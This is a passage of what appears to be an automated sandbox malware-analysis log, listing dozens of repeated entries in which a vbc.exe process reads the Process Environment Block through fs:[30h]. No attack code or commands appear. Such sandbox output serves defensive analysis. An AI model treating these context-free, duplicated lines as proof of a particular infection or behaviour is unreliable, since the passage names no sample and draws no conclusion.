                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E016 mov eax, dword ptr fs:[00000030h]7_2_0534E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4000 mov ecx, dword ptr fs:[00000030h]7_2_053B4000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D2000 mov eax, dword ptr fs:[00000030h]7_2_053D2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535C073 mov eax, dword ptr fs:[00000030h]7_2_0535C073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332050 mov eax, dword ptr fs:[00000030h]7_2_05332050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6050 mov eax, dword ptr fs:[00000030h]7_2_053B6050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F60B8 mov eax, dword ptr fs:[00000030h]7_2_053F60B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F60B8 mov ecx, dword ptr fs:[00000030h]7_2_053F60B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053280A0 mov eax, dword ptr fs:[00000030h]7_2_053280A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C80A8 mov eax, dword ptr fs:[00000030h]7_2_053C80A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533208A mov eax, dword ptr fs:[00000030h]7_2_0533208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C0F0 mov eax, dword ptr fs:[00000030h]7_2_0532C0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053720F0 mov ecx, dword ptr fs:[00000030h]7_2_053720F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0532A0E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053380E9 mov eax, dword ptr fs:[00000030h]7_2_053380E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B60E0 mov eax, dword ptr fs:[00000030h]7_2_053B60E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B20DE mov eax, dword ptr fs:[00000030h]7_2_053B20DE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0540634F mov eax, dword ptr fs:[00000030h]7_2_0540634F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C310 mov ecx, dword ptr fs:[00000030h]7_2_0532C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05350310 mov ecx, dword ptr fs:[00000030h]7_2_05350310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A30B mov eax, dword ptr fs:[00000030h]7_2_0536A30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A30B mov eax, dword ptr fs:[00000030h]7_2_0536A30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A30B mov eax, dword ptr fs:[00000030h]7_2_0536A30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D437C mov eax, dword ptr fs:[00000030h]7_2_053D437C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05408324 mov eax, dword ptr fs:[00000030h]7_2_05408324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05408324 mov ecx, dword ptr fs:[00000030h]7_2_05408324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05408324 mov eax, dword ptr fs:[00000030h]7_2_05408324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05408324 mov eax, dword ptr fs:[00000030h]7_2_05408324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B035C mov eax, dword ptr fs:[00000030h]7_2_053B035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B035C mov eax, dword ptr fs:[00000030h]7_2_053B035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B035C mov eax, dword ptr fs:[00000030h]7_2_053B035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B035C mov ecx, dword ptr fs:[00000030h]7_2_053B035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B035C mov eax, dword ptr fs:[00000030h]7_2_053B035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B035C mov eax, dword ptr fs:[00000030h]7_2_053B035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FA352 mov eax, dword ptr fs:[00000030h]7_2_053FA352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D8350 mov ecx, dword ptr fs:[00000030h]7_2_053D8350
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B2349 mov eax, dword ptr fs:[00000030h]7_2_053B2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328397 mov eax, dword ptr fs:[00000030h]7_2_05328397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328397 mov eax, dword ptr fs:[00000030h]7_2_05328397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05328397 mov eax, dword ptr fs:[00000030h]7_2_05328397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E388 mov eax, dword ptr fs:[00000030h]7_2_0532E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E388 mov eax, dword ptr fs:[00000030h]7_2_0532E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E388 mov eax, dword ptr fs:[00000030h]7_2_0532E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535438F mov eax, dword ptr fs:[00000030h]7_2_0535438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535438F mov eax, dword ptr fs:[00000030h]7_2_0535438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E3F0 mov eax, dword ptr fs:[00000030h]7_2_0534E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E3F0 mov eax, dword ptr fs:[00000030h]7_2_0534E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E3F0 mov eax, dword ptr fs:[00000030h]7_2_0534E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053663FF mov eax, dword ptr fs:[00000030h]7_2_053663FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053403E9 mov eax, dword ptr fs:[00000030h]7_2_053403E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE3DB mov eax, dword ptr fs:[00000030h]7_2_053DE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE3DB mov eax, dword ptr fs:[00000030h]7_2_053DE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE3DB mov ecx, dword ptr fs:[00000030h]7_2_053DE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE3DB mov eax, dword ptr fs:[00000030h]7_2_053DE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D43D4 mov eax, dword ptr fs:[00000030h]7_2_053D43D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D43D4 mov eax, dword ptr fs:[00000030h]7_2_053D43D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EC3CD mov eax, dword ptr fs:[00000030h]7_2_053EC3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A3C0 mov eax, dword ptr fs:[00000030h]7_2_0533A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A3C0 mov eax, dword ptr fs:[00000030h]7_2_0533A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A3C0 mov eax, dword ptr fs:[00000030h]7_2_0533A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A3C0 mov eax, dword ptr fs:[00000030h]7_2_0533A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A3C0 mov eax, dword ptr fs:[00000030h]7_2_0533A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A3C0 mov eax, dword ptr fs:[00000030h]7_2_0533A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053383C0 mov eax, dword ptr fs:[00000030h]7_2_053383C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053383C0 mov eax, dword ptr fs:[00000030h]7_2_053383C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053383C0 mov eax, dword ptr fs:[00000030h]7_2_053383C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053383C0 mov eax, dword ptr fs:[00000030h]7_2_053383C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B63C0 mov eax, dword ptr fs:[00000030h]7_2_053B63C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532823B mov eax, dword ptr fs:[00000030h]7_2_0532823B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0540625D mov eax, dword ptr fs:[00000030h]7_2_0540625D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E0274 mov eax, dword ptr fs:[00000030h]7_2_053E0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334260 mov eax, dword ptr fs:[00000030h]7_2_05334260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334260 mov eax, dword ptr fs:[00000030h]7_2_05334260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334260 mov eax, dword ptr fs:[00000030h]7_2_05334260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532826B mov eax, dword ptr fs:[00000030h]7_2_0532826B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A250 mov eax, dword ptr fs:[00000030h]7_2_0532A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336259 mov eax, dword ptr fs:[00000030h]7_2_05336259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EA250 mov eax, dword ptr fs:[00000030h]7_2_053EA250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EA250 mov eax, dword ptr fs:[00000030h]7_2_053EA250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B8243 mov eax, dword ptr fs:[00000030h]7_2_053B8243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B8243 mov ecx, dword ptr fs:[00000030h]7_2_053B8243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054062D6 mov eax, dword ptr fs:[00000030h]7_2_054062D6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C62A0 mov eax, dword ptr fs:[00000030h]7_2_053C62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C62A0 mov ecx, dword ptr fs:[00000030h]7_2_053C62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C62A0 mov eax, dword ptr fs:[00000030h]7_2_053C62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C62A0 mov eax, dword ptr fs:[00000030h]7_2_053C62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C62A0 mov eax, dword ptr fs:[00000030h]7_2_053C62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C62A0 mov eax, dword ptr fs:[00000030h]7_2_053C62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E284 mov eax, dword ptr fs:[00000030h]7_2_0536E284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E284 mov eax, dword ptr fs:[00000030h]7_2_0536E284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B0283 mov eax, dword ptr fs:[00000030h]7_2_053B0283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B0283 mov eax, dword ptr fs:[00000030h]7_2_053B0283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B0283 mov eax, dword ptr fs:[00000030h]7_2_053B0283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053402E1 mov eax, dword ptr fs:[00000030h]7_2_053402E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053402E1 mov eax, dword ptr fs:[00000030h]7_2_053402E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053402E1 mov eax, dword ptr fs:[00000030h]7_2_053402E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A2C3 mov eax, dword ptr fs:[00000030h]7_2_0533A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A2C3 mov eax, dword ptr fs:[00000030h]7_2_0533A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A2C3 mov eax, dword ptr fs:[00000030h]7_2_0533A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A2C3 mov eax, dword ptr fs:[00000030h]7_2_0533A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533A2C3 mov eax, dword ptr fs:[00000030h]7_2_0533A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B8D20 mov eax, dword ptr fs:[00000030h]7_2_053B8D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05326D10 mov eax, dword ptr fs:[00000030h]7_2_05326D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05326D10 mov eax, dword ptr fs:[00000030h]7_2_05326D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05326D10 mov eax, dword ptr fs:[00000030h]7_2_05326D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05364D1D mov eax, dword ptr fs:[00000030h]7_2_05364D1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E8D10 mov eax, dword ptr fs:[00000030h]7_2_053E8D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E8D10 mov eax, dword ptr fs:[00000030h]7_2_053E8D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534AD00 mov eax, dword ptr fs:[00000030h]7_2_0534AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534AD00 mov eax, dword ptr fs:[00000030h]7_2_0534AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534AD00 mov eax, dword ptr fs:[00000030h]7_2_0534AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C8D6B mov eax, dword ptr fs:[00000030h]7_2_053C8D6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330D59 mov eax, dword ptr fs:[00000030h]7_2_05330D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330D59 mov eax, dword ptr fs:[00000030h]7_2_05330D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330D59 mov eax, dword ptr fs:[00000030h]7_2_05330D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338D59 mov eax, dword ptr fs:[00000030h]7_2_05338D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338D59 mov eax, dword ptr fs:[00000030h]7_2_05338D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338D59 mov eax, dword ptr fs:[00000030h]7_2_05338D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338D59 mov eax, dword ptr fs:[00000030h]7_2_05338D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338D59 mov eax, dword ptr fs:[00000030h]7_2_05338D59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404D30 mov eax, dword ptr fs:[00000030h]7_2_05404D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CDB1 mov ecx, dword ptr fs:[00000030h]7_2_0536CDB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CDB1 mov eax, dword ptr fs:[00000030h]7_2_0536CDB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536CDB1 mov eax, dword ptr fs:[00000030h]7_2_0536CDB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05358DBF mov eax, dword ptr fs:[00000030h]7_2_05358DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05358DBF mov eax, dword ptr fs:[00000030h]7_2_05358DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F8DAE mov eax, dword ptr fs:[00000030h]7_2_053F8DAE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F8DAE mov eax, dword ptr fs:[00000030h]7_2_053F8DAE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05366DA0 mov eax, dword ptr fs:[00000030h]7_2_05366DA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05326DF6 mov eax, dword ptr fs:[00000030h]7_2_05326DF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535CDF0 mov eax, dword ptr fs:[00000030h]7_2_0535CDF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535CDF0 mov ecx, dword ptr fs:[00000030h]7_2_0535CDF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D0DF0 mov eax, dword ptr fs:[00000030h]7_2_053D0DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D0DF0 mov eax, dword ptr fs:[00000030h]7_2_053D0DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE0 mov eax, dword ptr fs:[00000030h]7_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE0 mov eax, dword ptr fs:[00000030h]7_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE0 mov eax, dword ptr fs:[00000030h]7_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE0 mov eax, dword ptr fs:[00000030h]7_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE0 mov eax, dword ptr fs:[00000030h]7_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533ADE0 mov eax, dword ptr fs:[00000030h]7_2_0533ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05350DE1 mov eax, dword ptr fs:[00000030h]7_2_05350DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CDEA mov eax, dword ptr fs:[00000030h]7_2_0532CDEA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532CDEA mov eax, dword ptr fs:[00000030h]7_2_0532CDEA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535EDD3 mov eax, dword ptr fs:[00000030h]7_2_0535EDD3
